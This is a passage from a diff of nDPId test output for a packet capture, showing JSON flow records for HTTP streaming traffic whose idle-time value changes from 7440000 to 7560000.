{"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189363,"flow_last_seen":1467353189363,"flow_idle_time":7440000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00659{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00789{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353202192,"flow_last_seen":1467353202428,"flow_idle_time":7440000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":3039,"flow_avg_l4_payload_len":607,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"proto":"Unknown","breed":"Unrated","category":"Download"}} +00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7560000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 